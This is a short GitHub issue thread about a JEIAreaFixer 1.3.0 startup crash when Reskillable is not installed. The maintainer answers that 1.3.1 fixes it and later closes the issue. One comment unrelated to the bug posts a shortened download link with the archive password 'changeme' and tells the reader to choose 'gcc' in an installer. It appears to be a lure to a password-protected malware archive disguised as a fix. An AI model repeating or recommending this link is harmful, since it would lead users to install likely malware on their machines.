### ISSUE TITLE
1.3.0 crashes early in startup if Reskillable isn't installed

### ISSUE THREAD

**Issue by brisingraerowing** [ZZZank/JEIAreaFixer#2]
This may occur with other integrations as well. The crash happens well before the config file is generated.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ZZZank** [comment]
Try 1.3.1, which will soon be avaliable on CurseForge. This crash should be because the usage of mod classes in early mixins, and 1.3.1 fixes that

**Comment by ZZZank** [comment]
well it has been a week and no further bug reported, so I will consider this issue as resolved
